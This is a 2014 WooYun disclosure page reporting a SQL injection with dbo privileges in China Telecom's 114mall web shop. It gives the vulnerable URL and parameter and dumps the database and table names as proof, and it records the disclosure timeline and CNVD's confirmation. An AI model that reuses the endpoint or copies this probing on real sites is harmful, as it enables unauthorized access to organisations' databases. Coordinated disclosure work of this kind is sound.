当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056929

漏洞标题:中国电信百事通商城SQL注射一枚dbo权限

相关厂商:中国电信

漏洞作者: 雅柏菲卡

提交时间:2014-04-13 16:44

修复时间:2014-05-28 16:45

公开时间:2014-05-28 16:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-13: 细节已通知厂商并且等待厂商处理中
2014-04-18: 厂商已经确认,细节仅向厂商公开
2014-04-28: 细节向核心白帽子及相关领域专家公开
2014-05-08: 细节向普通白帽子公开
2014-05-18: 细节向实习白帽子公开
2014-05-28: 细节向公众公开

简要描述:

............

详细说明:

...................

漏洞证明:

http://www.114mall.cn/tjsaima/history.aspx?username=jxhebin
available databases [15]:
[*] AdvSystem
[*] ExchangeReport
[*] master
[*] MobileInfoSearch
[*] MobileInfoSearch_Second
[*] model
[*] msdb
[*] my114mall
[*] nbmanage
[*] Northwind
[*] poi
[*] Present
[*] pubs
[*] SpecialLocalProduct
[*] tempdb
[168 tables]
+--------------------------------------+
| dbo.ANSWERLOG |
| dbo.ANSWERS |
| dbo.AUTH |
| dbo.OutCardsOrder |
| dbo.PD_OPTIONS |
| dbo.PD_ROLES |
| dbo.PD_USERS |
| dbo.Packages |
| dbo.TB_AD |
| dbo.TB_AD_AnswerLog |
| dbo.TB_AD_BlackList |
| dbo.TB_AD_CompInfo |
| dbo.TB_AD_Gift_Log |
| dbo.TB_AD_HotSpot_UserSet |
| dbo.TB_AD_Link |
| dbo.TB_AD_Question |
| dbo.TB_AD_Question_NoActiveUser |
| dbo.TB_AD_Question_Surpise_UserLog |
| dbo.TB_AD_Question_Surprise_Param |
| dbo.TB_AD_Question_UserLog |
| dbo.TB_AD_SpecialUser |
| dbo.TB_AD_Static |
| dbo.TB_AD_ViewLog |
| dbo.TB_AD_ViewLog200803 |
| dbo.TB_AD_ViewLog_Gardener |
| dbo.TB_Abnormal_IP |
| dbo.TB_Active_AD |
| dbo.TB_Bus |
| dbo.TB_Bus_Index |
| dbo.TB_Comment |
| dbo.TB_Commodity_Log |
| dbo.TB_Commodity_Price |
| dbo.TB_ConsumeLog |
| dbo.TB_Duma_UserInfo |
| dbo.TB_Err_Log |
| dbo.TB_Forbid |
| dbo.TB_Game_Log |
| dbo.TB_Game_Log200704 |
| dbo.TB_Game_Log200711 |
| dbo.TB_Game_Lucky_FreeUserLog |
| dbo.TB_Game_Lucky_Param |
| dbo.TB_Game_Param |
| dbo.TB_Game_WinLog |
| dbo.TB_Gift_Grab |
| dbo.TB_Gift_Grab_Invoice |
| dbo.TB_Gift_Grab_List |
| dbo.TB_Gift_Grab_Log |
| dbo.TB_Gift_Lock |
| dbo.TB_Grab_Log |
| dbo.TB_Info |
| dbo.TB_Info_Hot |
| dbo.TB_Integral_Log |
| dbo.TB_LOCK_ERROR |
| dbo.TB_Lock |
| dbo.TB_Lucky100 |
| dbo.TB_Lucky100_Award |
| dbo.TB_Lucky100_WinLog |
| dbo.TB_Lucky100_temp |
| dbo.TB_Lucky_DayUserLog |
| dbo.TB_Lucky_Gift |
| dbo.TB_Lucky_Log |
| dbo.TB_Lucky_RunLog |
| dbo.TB_Lucky_Temp |
| dbo.TB_Lucky_Ticket |
| dbo.TB_Lucky_Week_UserAct |
| dbo.TB_Lucky_Week_UserLogin |
| dbo.TB_Lucky_WinLog |
| dbo.TB_MobileGame_Log |
| dbo.TB_MobileGame_WinLog |
| dbo.TB_Plan |
| dbo.TB_Puzzles_Detail |
| dbo.TB_ReStart |
| dbo.TB_TEST |
| dbo.TB_Theater |
| dbo.TB_Ticket |
| dbo.TB_TicketCancel_Log |
| dbo.TB_TicketSell_Log |
| dbo.TB_Ticket_Grab |
| dbo.TB_Ticket_Special |
| dbo.TB_Time_Info |
| dbo.TB_User_DayAct |
| dbo.TB_ViewAD_Log |
| dbo.TB_Welcome_Log |
| dbo.TV_AD_Question_UserLog1 |
| dbo.TV_AD_Question_Userlog |
| dbo.TV_AD_ViewLog |
| dbo.TV_Bus_Search2 |
| dbo.TV_Gift_Grab |
| dbo.TV_Gift_Grab_Log |
| dbo.TV_Lucky100 |
| dbo.TV_Lucky100_detail |
| dbo.TV_Lucky_WinLog |
| dbo.TV_Ticket |
| dbo.TV_Ticket_Grab |
| dbo.T_NEWS |
| dbo.Tv_Lucky100_Detaila |
| dbo.commend |
| dbo.dtproperties |
| dbo.pbcatcol |
| dbo.pbcatedt |
| dbo.pbcatfmt |
| dbo.pbcattbl |
| dbo.pbcatvld |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.t_tradeCount |
| dbo.tb_act_do_lock |
| dbo.tb_active_temp |
| dbo.tb_ad_viewlog200804 |
| dbo.tb_ad_viewlog200902 |
| dbo.tb_ad_viewlog200903 |
| dbo.tb_ad_viewlog200904 |
| dbo.tb_ad_viewlog200905 |
| dbo.tb_ad_viewlog200906 |
| dbo.tb_ad_viewlog200907 |
| dbo.tb_ad_viewlog200908 |
| dbo.tb_ad_viewlog200909 |
| dbo.tb_ad_viewlog200910 |
| dbo.tb_ad_viewlog200911 |
| dbo.tb_ad_viewlog200912 |
| dbo.tb_ad_viewlog201002 |
| dbo.tb_ad_viewlog201003 |
| dbo.tb_ad_viewlog201004 |
| dbo.tb_ad_viewlog201005 |
| dbo.tb_ad_viewlog201006 |
| dbo.tb_ad_viewlog201011 |
| dbo.tb_ad_viewlog201012 |
| dbo.tb_ad_viewlog201210 |
| dbo.tb_ad_viewlog201211 |
| dbo.tb_ad_viewlog201212 |
| dbo.tb_ad_viewlog201301 |
| dbo.tb_ad_viewlog201302 |
| dbo.tb_ad_viewlog201303 |
| dbo.tb_ad_viewlog201304 |
| dbo.tb_ad_viewlog201305 |
| dbo.tb_ad_viewlog201306 |
| dbo.tb_ad_viewlog201307 |
| dbo.tb_ad_viewlog201308 |
| dbo.tb_ad_viewlog201309 |
| dbo.tb_ad_viewlog201310 |
| dbo.tb_ad_viewlog201311 |
| dbo.tb_ad_viewlog201312 |
| dbo.tb_ad_viewlog201401 |
| dbo.tb_ad_viewlog201402 |
| dbo.tb_ad_viewlog201403 |
| dbo.tb_ad_viewlog201404 |
| dbo.tb_ad_viewlogerror |
| dbo.tb_cata |
| dbo.tb_duma |
| dbo.tb_duma2008 |
| dbo.tb_duma_back |
| dbo.tb_duma_comment |
| dbo.tb_duma_userinfotest |
| dbo.tb_infotest |
| dbo.tb_luck_ip |
| dbo.tb_lucky_winlogtest |
| dbo.tb_temp |
| dbo.tv_ad |
| dbo.tv_saima |
| dbo.tv_saima_bet |
| dbo.tv_saima_bet_1 |
| dbo.tv_saima_horse |
| dbo.tv_test |
| my114mall2008.DC_answerlog |
| my114mall2008.DC_givePresentLog |
| my114mall2008.DC_userinfo |
| my114mall2008.Logs_file |
| my114mall2008.tb_ad_viewlog_20090224 |
+--------------------------------------+

修复方案:

................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-04-18 09:37

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报中国电信集团公司处置。

最新状态:

暂无